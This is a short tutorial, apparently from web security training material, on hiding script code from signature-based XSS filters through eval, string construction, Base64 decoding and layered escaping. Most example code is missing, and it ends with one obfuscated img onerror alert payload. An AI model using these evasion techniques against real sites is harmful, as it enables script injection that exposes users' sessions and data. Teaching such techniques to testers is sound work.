Bypassing Signature-Based XSS Filters: Modifying Script Code
If you can make use of the eval command, possibly by using the preceding technique to escape some of its characters, you can execute other commands by passing them to the eval command in string form.
This allows you to use various string manipulation techniques to hide the command you are executing.
Furthermore, superfluous escape characters within strings are ignored.
You can use sites such as Hackvector to help convert your payloads before testing them in your browser's web console.
Dynamically Constructing Strings
You can use other techniques to dynamically construct strings to use in your attacks, for example:
In the screenshot, the payload:
is being tested in the Firefox web console.
This example allows you to decode a Base64-encoded command before it is passed to eval.
Alternatives to eval
If direct calls to the eval command are not possible, there are other methods you can use to execute commands in string form:
If the dot character is being blocked, you can use other methods to perform your attack:
Combining multiple techniques
The techniques described so far can often be used in combination to apply several layers of obfuscation to your attack.
In this example the "e" character in "alert" has been escaped using Unicode escaping, and the backslash used in the Unicode escape has been HTML-encoded:
<img onerror=eval('al\u0065rt(1)') src=a>